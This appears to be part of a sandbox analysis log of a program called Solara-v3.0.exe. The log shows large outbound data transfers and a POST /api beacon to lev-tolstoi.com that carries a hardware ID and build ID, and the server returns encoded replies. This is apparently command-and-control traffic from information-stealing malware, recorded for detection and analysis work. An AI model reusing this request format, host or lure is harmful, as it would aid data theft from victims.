                                                                                                                                                                                                                                            2024-12-28 01:55:16 UTC15331OUTData Raw: ce 85 a4 74 91 91 1a 37 ee 46 a1 53 b5 3a b7 6f 66 56 b2 55 50 a8 1d 51 d6 b8 f9 16 f1 80 9c fd 85 4f 3f 25 4d 85 34 e6 17 5b ec d0 52 4e ee 8a 0a f7 dd f4 e6 c2 2b 92 2e 70 09 3f fd 93 7d c6 89 97 85 5d 97 64 95 06 4f cd 50 8b 3f e8 52 3c 10 bb b0 7c c5 d0 a9 8a 98 ca 75 bb 9f 5b d6 8c cc c6 c8 29 7e f8 8f a6 74 64 4f ae 62 92 63 2b a2 30 a7 05 a5 7d e7 9b 33 13 85 7e df a6 0b 58 e1 68 44 bd b5 76 48 f2 b9 b2 45 6b 53 95 ff 2e 7c e6 4b b3 00 97 03 f0 3b 15 03 17 40 d5 a6 5e 81 6a 8e bb 66 97 25 b3 27 42 a8 6f 23 77 ee 42 8c f3 aa d4 de d6 ac 3e c1 2e d4 1d ee 06 64 f7 73 e1 c3 e3 94 eb c6 b6 91 5c 49 44 94 a4 40 f5 b7 9e 95 64 a4 6b 94 72 fe c3 95 46 5d f2 d1 2f f8 0b 10 96 67 5e e6 33 27 1e 0f 1b ac f3 05 46 48 2f 33 2d b5 c2 41 3e 03 55 9b 3d 26 c9 b6
                                                                                                                                                                                                                                            Data Ascii: t7FS:ofVUPQO?%M4[RN+.p?}]dOP?R<|u[)~tdObc+0}3~XhDvHEkS.|K;@^jf%'Bo#wB>.ds\ID@dkrF]/g^3'FH/3-A>U=&
                                                                                                                                                                                                                                            2024-12-28 01:55:16 UTC15331OUTData Raw: f3 5e 22 5b 3f 62 9e 5f 83 13 44 04 a1 0c db 37 5e d8 78 57 26 5a 71 3f 12 d7 10 f4 37 3e bb 6e da 28 02 8e fc d8 d9 c3 8b b9 b3 c4 e8 e8 ed 21 f7 5f d7 c3 fb 25 9e 6b 48 7e 3f 22 0b 50 9b 59 60 4b 14 85 98 87 60 6c 56 af 39 0c 83 a5 71 d1 93 73 8c 13 86 e3 58 f8 21 aa d6 f5 37 b1 54 04 8a e8 96 c3 f2 87 d7 97 3b 1c 3d 30 17 6a f9 bb 79 d8 eb 01 d7 f2 8d a2 fd f4 86 92 ac 92 34 b6 f2 8a d5 9a f7 1c be 8a df 48 d5 03 ef 75 90 56 c3 f2 59 75 3a ae 2a 4f e8 02 c1 6f d2 3f ec 3b 0c 72 8b 93 5b 0b 72 44 1b 1c 45 80 f0 a0 58 c5 da f8 9a 35 06 5e dd 5d 92 33 d1 e5 e6 2e f5 45 01 c1 56 92 d7 c7 12 c4 c2 6c 9f e0 3b df a4 ae 9d 3b 04 7b bc 11 1a 49 2d d7 4f a6 64 0a e4 c3 6b 8e 87 7f fd 24 5c 8f 1a 8c ca 37 46 75 18 4a 3e e4 08 08 f7 9c c7 e6 e0 2d 65 28 10 a7 3c
                                                                                                                                                                                                                                            Data Ascii: ^"[?b_D7^xW&Zq?7>n(!_%kH~?"PY`K`lV9qsX!7T;=0jy4HuVYu:*Oo?;r[rDEX5^]3.EVl;;{I-Odk$\7FuJ>-e(<
                                                                                                                                                                                                                                            2024-12-28 01:55:16 UTC15331OUTData Raw: 35 78 53 45 13 d5 05 ec 1f 5e 23 7d 8e 6c 59 d2 ed 57 16 bd 12 14 83 a6 a0 a2 f4 18 30 dd ad 9d d0 5e 69 2e 85 d8 3d 29 ea 59 8d ef 41 26 67 1a 5b f2 1b b6 f0 08 55 18 c9 af 6e ea 49 45 77 49 69 d0 76 c3 b5 cc c7 41 7b a6 b3 e2 d4 c6 06 e3 0c 0b 7e 75 3a 1b 35 99 e0 fa 44 ed 1f 5e 70 34 d1 e5 5d c4 ce 1d 1e fc a1 19 4b 14 14 20 5c da 53 17 f0 85 ea 14 0b e9 bb bd 51 fd 3c b9 88 b4 f8 bd 28 10 ed 11 d2 38 18 57 ba da ab d9 87 f0 18 7a af fe e1 3c 2a 85 f5 f2 cb 4e a9 65 65 ec 95 1d 29 45 f4 bd 5e 48 7f 3b c4 21 61 e0 c5 18 3b a5 0b 62 af d1 5d 04 c1 7d d6 5c 42 d0 ec 38 6d 88 8d c1 80 02 0b ff 3c 0c f8 ac e7 89 e4 02 ff 6e c7 bd cd 68 24 25 e3 04 44 b7 3c 04 d6 16 9f ec 92 05 a9 bc 39 3b 7d 66 d8 ab 13 33 50 af 61 f2 cf 4d de d3 65 7c 6c 88 87 f6 ed 65 95
                                                                                                                                                                                                                                            Data Ascii: 5xSE^#}lYW0^i.=)YA&g[UnIEwIivA{~u:5D^p4]K \SQ<(8Wz<*Nee)E^H;!a;b]}\B8m<nh$%D<9;}f3PaMe|le
                                                                                                                                                                                                                                            2024-12-28 01:55:16 UTC15331OUTData Raw: a8 c2 f2 bb ca e5 b1 d7 b7 b7 1f ff e3 df b7 e5 37 3e 3c a0 f6 6e e5 ba 3d c3 39 18 d8 97 2d 90 ac c4 0d 03 1a be a3 0c e0 d9 43 ac 63 eb e4 9e 27 1e 0b 86 7b 20 8c 94 f6 c7 fd 0b e5 5a 25 db 71 47 1e f5 7b 47 7b 5b 7b 57 cc ad 5f ee f3 fa b2 bb dd fb 84 ff 8f c2 0b 8f 5f 64 9e b0 f2 ae bc e2 70 b3 5d ed cb 2e 9d c1 10 ab 9b 63 3f 75 f6 ea 0c c0 07 ff 1d f0 19 3b f1 ad fb 7a b1 66 89 c2 d6 96 d0 37 ff d6 35 67 eb 4a a4 53 40 c5 f5 bc a3 77 11 e3 3d d5 df 90 10 f7 d8 23 40 f7 7b d5 59 3e 60 21 0c 8a c2 43 e1 37 35 37 2c 40 0f 1c 3d f1 2c cb e7 96 77 35 9e 8a a7 e3 40 da 3d 8d 3c 2c 9a 07 99 fb 1f 5e ab 3f 09 83 05 8c 3b 46 cc fd af 8e fa df 86 33 bb 81 a7 24 a4 68 31 b7 1d 9d 17 cb 75 f8 3b 06 10 02 a0 ab 22 1b 23 32 4c 1f 6f 48 5a ec 66 3d 9e e4 2e e2 bd
                                                                                                                                                                                                                                            Data Ascii: 7><n=9-Cc'{ Z%qG{G{[{W__dp].c?u;zf75gJS@w=#@{Y>`!C757,@=,w5@=<,^?;F3$h1u;"#2LoHZf=.
                                                                                                                                                                                                                                            2024-12-28 01:55:16 UTC15331OUTData Raw: 3e 39 46 37 bd 08 dd b9 c0 03 b6 b1 55 61 6a e8 09 fb 5a 32 5c 4a f7 f0 43 5a e8 e7 95 f9 e3 7e 77 b9 04 3f 3b f5 ef ff 96 6c 9e ce 92 1c fd fc 60 7e 4b 69 9d 1c 5c 8c c9 31 42 4f 0c 58 4d 29 40 e9 e7 82 6d 5d 72 9c 1f 03 b6 b2 e3 58 d9 e7 9b 5c 2f 08 c8 ab 7a 83 33 75 16 fd 25 03 f6 33 3c 32 69 10 7a d7 fb e3 4e 6d a7 79 31 fc f1 12 31 ef db be c0 8a c6 26 a1 cb c7 75 9b 84 c5 02 f0 f2 e1 ee e2 e3 6c fa 81 62 7e 91 bb eb c3 ff 90 51 77 4a 68 c9 d2 ba 4b 1f ef f8 84 ce 7d 72 c3 eb 70 7e 66 dd 04 36 03 91 fa 38 de 73 00 a3 d2 44 36 74 fe c5 fa ec 82 d2 19 5b 17 76 2e 5e bf 01 e5 ba bd 06 58 c6 82 33 65 7a a0 a1 9c b3 69 15 91 0a 91 2a c3 2c 5e 51 a2 97 3b ff 56 e8 08 d8 4f fa cd 3a 73 74 f8 2c e1 8b fb c9 91 7a 40 cd 5f b0 85 56 a4 a3 a8 9a 93 99 47 f1 fc
                                                                                                                                                                                                                                            Data Ascii: >9F7UajZ2\JCZ~w?;l`~Ki\1BOXM)@m]rX\/z3u%3<2izNmy11&ulb~QwJhK}rp~f68sD6t[v.^X3ezi*,^Q;VO:st,z@_VG
                                                                                                                                                                                                                                            2024-12-28 01:55:16 UTC15331OUTData Raw: b2 3b 73 50 35 e6 66 f1 be d8 33 4a f5 0a 11 14 b1 58 3f df d9 3a 34 16 6b e3 d8 6d 1b 4d 4d db e6 35 21 dc 48 52 57 3b 2f 32 69 e1 94 db 60 e7 0c 77 6d cf a3 e3 ac fb f3 e7 97 fb b2 74 36 81 69 d6 61 40 d8 e5 29 29 b6 6b c4 c4 49 8c 7e 5a 8c f6 ff 5b 29 25 41 50 94 be 67 2f 48 11 d4 ad 15 bc 86 91 23 17 5c 21 74 e9 cf 66 e3 47 e8 ce 1d 7b 50 c0 46 1e eb 49 6e fb 20 8d 0d 96 4f 31 42 16 ab df 1f 5b 3f 3d 9c 3f e8 35 f9 e5 b7 4d 77 46 0c f5 33 b7 fb 87 51 c4 b9 3d a0 9f 5b 9d 7a d5 a4 d0 ee 66 18 fb ab c1 80 97 de 07 16 b7 af c2 c0 ea 33 66 9c 1d d6 22 ec 3b 94 18 cc c0 74 ab d2 87 4a 27 5a fc 55 cd 3d 3d fe c5 bb 37 00 ae 95 18 0f 92 16 13 8f 0d dd 30 40 b0 84 c0 39 8b 3a ef 14 56 f2 be b0 a7 69 d4 4b bb 09 b2 d0 69 bc 57 9d ab 81 c8 5d 24 09 36 a9 37 c9
                                                                                                                                                                                                                                            Data Ascii: ;sP5f3JX?:4kmMM5!HRW;/2i`wmt6ia@))kI~Z[)%APg/H#\!tfG{PFIn O1B[?=?5MwF3Q=[zf3f";tJ'ZU==70@9:ViKiW]$67
                                                                                                                                                                                                                                            2024-12-28 01:55:16 UTC15331OUTData Raw: 79 56 9e a6 9b e7 17 89 a1 9e f8 2f 35 82 22 f0 6c df e6 72 64 ee 1b 3f e7 07 6c ce ad 4b 27 d7 a6 c7 54 04 74 ed 2c f0 ce 91 5f ff eb 59 dc eb 7a e9 61 8c 93 ae 1f 44 13 c4 ad 1e 92 02 b3 3e b7 9a 6d f8 3a f3 27 09 90 5b df 95 3d 02 f4 d2 2d aa 57 56 1d 17 3d d3 61 24 04 cb 2e ae c8 ac f5 1a 45 ed 37 80 64 56 4b 90 91 ef 56 19 b5 7c f8 40 7f 86 a5 68 5b 3a 3d 3a 43 e5 3b 15 24 c5 71 2f b0 1f 88 d8 4f b7 87 f0 a7 cc 7a 79 21 db 46 aa 5e b1 c4 11 ec 62 80 2b 20 0a 43 25 86 8e 90 6a 4e ad 10 7b 37 42 e9 ce 86 24 6a c4 bc 3f c2 3e 5e 26 84 e0 60 e1 ae e7 c1 0c ca f3 84 f0 16 aa 16 2a c3 aa 9f 42 2a 6d 41 5e 31 62 6a fc c4 d4 bf eb ca df 0d b2 2a b6 21 36 8b f8 81 29 dc 32 73 92 11 45 11 6b c6 e8 f7 48 2f 1c dd bf 96 0c ac c4 b7 25 3e 91 93 26 31 be 0b f3 91
                                                                                                                                                                                                                                            Data Ascii: yV/5"lrd?lK'Tt,_YzaD>m:'[=-WV=a$.E7dVKV|@h[:=:C;$q/Ozy!F^b+ C%jN{7B$j?>^&`*B*mA^1bj*!6)2sEkH/%>&1
                                                                                                                                                                                                                                            2024-12-28 01:55:19 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:19 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=qesoqphn3uspb1dcratqo93t8u; expires=Tue, 22 Apr 2025 19:41:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSQEb7trZ9Zgu3LrYFmVNqppWbPtR85thtdUSg%2BL%2Fw7YA1jXPEA6RCXc9MxJL3mpHBxELsQSrS9Mcxt9MimHN6CjUwXH6sLbDmxEL3O%2BYJ6%2B9hMGXGz%2FTdEXN4EYr0McsU4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded5f78f77d05-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1832&min_rtt=1825&rtt_var=700&sent=293&recv=586&lost=0&retrans=0&sent_bytes=2834&recv_bytes=568217&delivery_rate=1546610&cwnd=195&unsent_bytes=0&cid=77806b9a5bb99de9&ts=2439&x=0"


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            8192.168.2.549727104.21.66.864435668C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-28 01:55:20 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 86
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-28 01:55:20 UTC86OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 26 6a 3d 26 68 77 69 64 3d 45 33 38 30 33 30 41 36 43 42 41 31 33 37 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41
                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=yau6Na--899083440&j=&hwid=E38030A6CBA13717BCFD68B774EF9B7A
                                                                                                                                                                                                                                            2024-12-28 01:55:21 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:21 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=evgmqmq411d2vqvk60lf4os8mg; expires=Tue, 22 Apr 2025 19:42:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DDRKmBDeOmomHAIlWcwlD6ACcQAxCDECy3ep3jnu4cMvLuBLaXASknuTOaRWG2WndPpwRWbozTZzfVEKav9FIpdZgtDyT0LbVQrk42hFqkk%2ByaNL%2FQTFqlA8XgUe9cQbXUM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded771c587d02-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1829&rtt_var=695&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=985&delivery_rate=1564844&cwnd=230&unsent_bytes=0&cid=d2f787f69617e885&ts=813&x=0"
                                                                                                                                                                                                                                            2024-12-28 01:55:21 UTC248INData Raw: 34 37 63 0d 0a 55 42 32 2f 57 67 79 2b 39 2b 6f 74 70 33 46 45 54 62 62 66 6b 6a 4d 4e 37 77 7a 51 72 46 36 71 32 38 47 34 54 57 49 74 30 4b 41 4c 5a 70 30 38 65 4a 7a 4e 32 77 47 46 46 47 5a 33 68 2f 4f 77 56 79 2f 56 4c 6f 44 2b 61 5a 6d 58 72 75 34 68 4a 68 2b 78 7a 47 4a 36 35 79 74 4e 30 38 36 7a 61 63 30 36 66 52 7a 55 6a 2b 56 32 62 4b 73 39 76 4d 49 6d 2f 6f 79 56 39 78 6b 57 52 6f 62 58 41 6c 53 48 4c 32 54 35 6f 72 70 33 31 6a 6b 6c 44 39 4f 77 30 56 45 38 69 45 4f 64 33 6d 2f 6f 71 4a 32 58 44 44 42 43 67 50 67 48 65 2f 6b 55 56 76 50 43 70 52 2f 31 4a 58 51 6f 6a 36 61 6b 64 56 65 2b 4e 62 33 63 4f 73 57 64 39 39 38 48 46 48 71 52 6c 43 6c 72 36 68 31 32 68 72 57 74 53 70 34 72 48 6e 58 6a 37 76 35 2f 5a 74 68 57 6c 75 45
                                                                                                                                                                                                                                            Data Ascii: 47cUB2/Wgy+9+otp3FETbbfkjMN7wzQrF6q28G4TWIt0KALZp08eJzN2wGFFGZ3h/OwVy/VLoD+aZmXru4hJh+xzGJ65ytN086zac06fRzUj+V2bKs9vMIm/oyV9xkWRobXAlSHL2T5orp31jklD9Ow0VE8iEOd3m/oqJ2XDDBCgPgHe/kUVvPCpR/1JXQoj6akdVe+Nb3cOsWd998HFHqRlClr6h12hrWtSp4rHnXj7v5/ZthWluE
                                                                                                                                                                                                                                            2024-12-28 01:55:21 UTC907INData Raw: 70 37 4a 57 49 38 52 55 77 62 36 48 56 46 55 54 59 43 57 48 45 78 39 35 67 2f 52 30 79 41 75 2b 38 33 58 42 72 6e 47 6d 59 6c 53 62 73 6f 59 37 55 41 56 73 66 6b 39 41 61 54 63 38 4d 51 4d 36 6c 6a 68 76 6b 4f 42 4d 33 31 2b 66 69 64 45 53 75 66 36 58 30 5a 2b 4f 33 38 4d 78 35 55 30 4b 41 2b 42 64 53 36 52 52 57 32 4d 4b 68 56 50 55 67 4b 48 2f 59 37 2f 39 31 56 37 34 31 76 64 77 36 78 5a 33 33 7a 51 63 55 65 72 6d 59 5a 57 76 36 63 58 61 47 74 71 31 4b 6e 69 73 65 66 2b 50 75 2b 55 6c 6d 32 46 61 57 2f 41 2b 64 36 49 33 58 47 31 4e 70 34 73 45 38 4c 39 67 43 66 66 2b 61 30 33 54 76 47 77 38 35 35 37 33 43 52 45 6a 5a 53 4f 48 48 46 74 4b 50 6c 75 77 43 4e 6c 6d 37 39 57 64 56 79 54 6c 35 31 71 43 2f 66 66 30 41 45 77 62 30 75 76 31 77 62 4e 35 72 6e 2b
                                                                                                                                                                                                                                            Data Ascii: p7JWI8RUwb6HVFUTYCWHEx95g/R0yAu+83XBrnGmYlSbsoY7UAVsfk9AaTc8MQM6ljhvkOBM31+fidESuf6X0Z+O38Mx5U0KA+BdS6RRW2MKhVPUgKH/Y7/91V741vdw6xZ33zQcUermYZWv6cXaGtq1Knisef+Pu+Ulm2FaW/A+d6I3XG1Np4sE8L9gCff+a03TvGw85573CREjZSOHHFtKPluwCNlm79WdVyTl51qC/ff0AEwb0uv1wbN5rn+
                                                                                                                                                                                                                                            2024-12-28 01:55:21 UTC1369INData Raw: 33 32 30 34 0d 0a 65 59 66 30 48 30 6e 4c 4d 56 6d 48 76 35 78 4f 30 68 6b 54 47 4f 61 46 34 32 74 73 72 57 6d 2f 37 7a 79 62 76 49 37 31 50 31 4e 76 6f 2f 78 2f 58 4f 30 31 58 4f 6d 67 6a 47 76 70 4b 77 6c 34 2b 65 33 41 5a 7a 32 4b 4e 61 6d 61 47 50 43 4b 2b 4e 55 39 42 6b 4b 57 6c 6a 64 58 79 51 31 4e 69 6f 36 63 65 4f 41 4c 66 41 2f 78 75 4b 74 70 56 39 64 5a 34 63 63 6b 77 65 79 62 2f 68 30 77 47 75 50 73 50 30 76 54 48 6a 37 66 6d 39 68 4b 2f 77 41 46 49 49 2b 47 31 6c 6c 47 31 6c 32 79 2f 43 6e 76 75 6f 57 4a 49 51 78 56 68 50 63 45 55 75 73 75 5a 2b 76 4f 6f 6c 76 45 42 43 77 61 34 34 2f 49 51 6c 57 4f 54 72 58 44 48 63 6a 71 70 76 63 41 45 42 79 53 30 77 77 79 2f 67 68 6a 37 71 43 39 53 2b 45 2f 48 67 43 44 6b 4b 42 68 57 64 39 70 36 64 56 6f 37
                                                                                                                                                                                                                                            Data Ascii: 3204eYf0H0nLMVmHv5xO0hkTGOaF42tsrWm/7zybvI71P1Nvo/x/XO01XOmgjGvpKwl4+e3AZz2KNamaGPCK+NU9BkKWljdXyQ1Nio6ceOALfA/xuKtpV9dZ4cckweyb/h0wGuPsP0vTHj7fm9hK/wAFII+G1llG1l2y/CnvuoWJIQxVhPcEUusuZ+vOolvEBCwa44/IQlWOTrXDHcjqpvcAEByS0wwy/ghj7qC9S+E/HgCDkKBhWd9p6dVo7
                                                                                                                                                                                                                                            2024-12-28 01:55:21 UTC1369INData Raw: 5a 43 56 6d 52 79 41 77 79 32 47 70 6d 31 61 61 45 52 73 6f 74 61 33 2f 78 37 64 42 43 53 70 6c 47 35 74 67 54 79 4c 33 31 31 6e 6f 53 52 5a 7a 31 48 33 48 38 45 33 2b 48 6e 4d 46 72 79 68 55 4d 46 59 4c 75 78 6e 70 58 74 32 4b 48 35 69 6e 6b 74 34 62 4f 4c 77 64 56 67 74 41 6d 5a 63 73 67 61 34 65 43 73 46 66 58 46 6e 41 65 32 61 76 46 53 54 69 49 5a 72 37 35 47 35 2b 6f 39 64 41 39 46 58 32 65 6b 53 4e 53 36 53 74 37 30 4d 4b 79 63 59 67 70 64 7a 7a 38 76 74 63 42 61 6f 70 4e 73 65 59 57 67 65 6a 30 35 47 49 4c 61 4b 54 69 4f 32 6e 6d 48 6d 62 31 7a 72 59 43 7a 77 63 58 43 4e 53 64 33 32 4e 68 32 6c 69 44 7a 69 37 6b 36 35 47 4e 4b 79 70 44 35 38 4d 55 58 2f 6f 6f 56 63 2b 46 72 45 72 43 48 67 63 76 68 37 6a 64 59 31 79 66 66 75 48 30 42 70 4b 70 38 76
                                                                                                                                                                                                                                            Data Ascii: ZCVmRyAwy2Gpm1aaERsota3/x7dBCSplG5tgTyL311noSRZz1H3H8E3+HnMFryhUMFYLuxnpXt2KH5inkt4bOLwdVgtAmZcsga4eCsFfXFnAe2avFSTiIZr75G5+o9dA9FX2ekSNS6St70MKycYgpdzz8vtcBaopNseYWgej05GILaKTiO2nmHmb1zrYCzwcXCNSd32Nh2liDzi7k65GNKypD58MUX/ooVc+FrErCHgcvh7jdY1yffuH0BpKp8v
                                                                                                                                                                                                                                            2024-12-28 01:55:21 UTC1369INData Raw: 6b 70 67 52 4b 66 6b 4d 53 49 32 57 69 57 72 2f 49 51 63 4a 30 72 6a 77 43 30 47 7a 49 2b 48 48 43 75 75 52 68 6f 35 30 55 56 37 6b 37 79 4e 74 7a 57 31 75 2f 5a 53 49 61 4f 55 68 4c 54 37 59 6c 65 42 45 59 4c 78 56 73 63 45 7a 78 4f 32 6c 37 69 67 76 66 65 44 72 65 30 6e 76 63 57 48 4f 6d 59 42 49 31 54 38 48 4b 76 6d 46 35 51 4e 34 31 31 79 34 37 78 58 36 6c 66 50 58 4e 41 52 62 36 66 63 59 57 75 38 6a 58 63 37 44 32 56 54 75 41 67 34 42 67 4c 65 6d 57 6b 6a 64 5a 5a 54 65 45 63 69 56 6f 2f 30 67 56 48 72 6c 6b 68 78 59 69 7a 35 67 32 5a 2b 48 51 39 55 74 61 77 2f 63 35 2f 6c 53 54 4b 45 30 6f 64 55 6d 2b 4c 53 4f 6a 79 45 2b 41 70 58 34 59 31 50 79 61 46 6a 78 6f 35 35 47 38 52 4d 71 4c 73 57 34 2b 6c 5a 6c 71 46 61 65 37 53 33 6f 6e 34 72 6f 4b 46 42
                                                                                                                                                                                                                                            Data Ascii: kpgRKfkMSI2WiWr/IQcJ0rjwC0GzI+HHCuuRho50UV7k7yNtzW1u/ZSIaOUhLT7YleBEYLxVscEzxO2l7igvfeDre0nvcWHOmYBI1T8HKvmF5QN411y47xX6lfPXNARb6fcYWu8jXc7D2VTuAg4BgLemWkjdZZTeEciVo/0gVHrlkhxYiz5g2Z+HQ9Utaw/c5/lSTKE0odUm+LSOjyE+ApX4Y1PyaFjxo55G8RMqLsW4+lZlqFae7S3on4roKFB
                                                                                                                                                                                                                                            2024-12-28 01:55:21 UTC1369INData Raw: 6d 37 78 50 31 58 36 6e 4a 41 47 37 77 55 4b 4a 4f 53 4d 33 58 35 4a 6a 6c 6d 35 33 53 62 7a 6b 37 44 35 49 46 74 30 6c 4d 70 67 56 75 68 6a 57 6f 2b 4f 6d 78 54 66 57 6e 64 38 34 6f 6a 77 63 56 2b 62 51 62 4b 55 46 75 4b 72 67 4e 41 36 4c 78 2b 2b 77 53 46 37 68 78 56 61 39 6f 4b 66 54 75 67 30 4e 6e 7a 6b 71 64 35 72 61 4a 30 38 6d 39 6f 5a 33 72 71 73 36 69 59 6e 56 36 50 61 47 33 7a 4c 47 53 66 34 72 62 4e 6b 2f 6b 6b 53 4b 66 72 6f 33 6c 6f 2b 6e 31 44 2f 35 42 44 38 74 35 58 75 49 51 78 4c 6c 35 4a 6c 63 64 56 72 50 64 57 4e 67 52 72 39 4e 7a 49 35 36 76 44 6f 51 56 69 4c 59 72 58 56 61 4e 75 35 6c 38 38 59 43 46 71 44 36 54 70 2b 6c 47 6c 42 69 4a 50 54 53 4d 31 49 64 69 79 46 73 50 70 6c 62 36 31 64 6b 38 38 38 37 5a 79 64 6c 79 51 53 54 72 33 31
                                                                                                                                                                                                                                            Data Ascii: m7xP1X6nJAG7wUKJOSM3X5Jjlm53Sbzk7D5IFt0lMpgVuhjWo+OmxTfWnd84ojwcV+bQbKUFuKrgNA6Lx++wSF7hxVa9oKfTug0Nnzkqd5raJ08m9oZ3rqs6iYnV6PaG3zLGSf4rbNk/kkSKfro3lo+n1D/5BD8t5XuIQxLl5JlcdVrPdWNgRr9NzI56vDoQViLYrXVaNu5l88YCFqD6Tp+lGlBiJPTSM1IdiyFsPplb61dk8887ZydlyQSTr31
                                                                                                                                                                                                                                            2024-12-28 01:55:21 UTC1369INData Raw: 4e 46 6a 62 75 65 48 5a 4d 4a 48 69 69 50 75 64 46 62 66 74 38 37 6e 74 34 56 77 37 6d 76 38 44 6b 74 62 4a 6d 51 41 58 7a 54 4d 55 50 6f 6b 35 31 73 31 78 34 69 65 50 47 78 71 6d 6f 30 71 33 71 37 32 77 37 48 71 35 6d 4e 50 51 78 56 6c 50 59 35 5a 2b 63 75 5a 2b 69 56 68 48 54 55 4d 43 78 2f 34 5a 7a 52 42 57 69 5a 4e 4a 66 38 50 2f 69 71 67 49 74 2f 45 55 47 39 78 7a 70 78 6a 43 4a 34 79 36 32 7a 46 4d 4d 72 43 58 6a 35 37 63 42 6c 65 49 74 31 71 66 73 59 6e 4a 36 62 30 33 30 68 57 70 58 6c 50 79 53 49 50 6a 32 48 6e 74 30 62 7a 45 64 38 4e 66 47 34 39 6c 39 48 6d 45 36 33 6c 54 58 50 6f 71 6a 43 4f 68 64 72 34 4a 59 2f 63 39 67 67 50 74 57 6a 32 30 54 68 49 41 56 2f 6a 34 62 57 57 54 37 61 5a 35 54 65 4e 65 53 36 36 73 38 5a 45 6e 75 7a 30 47 68 6c 7a
                                                                                                                                                                                                                                            Data Ascii: NFjbueHZMJHiiPudFbft87nt4Vw7mv8DktbJmQAXzTMUPok51s1x4iePGxqmo0q3q72w7Hq5mNPQxVlPY5Z+cuZ+iVhHTUMCx/4ZzRBWiZNJf8P/iqgIt/EUG9xzpxjCJ4y62zFMMrCXj57cBleIt1qfsYnJ6b030hWpXlPySIPj2Hnt0bzEd8NfG49l9HmE63lTXPoqjCOhdr4JY/c9ggPtWj20ThIAV/j4bWWT7aZ5TeNeS66s8ZEnuz0Ghlz
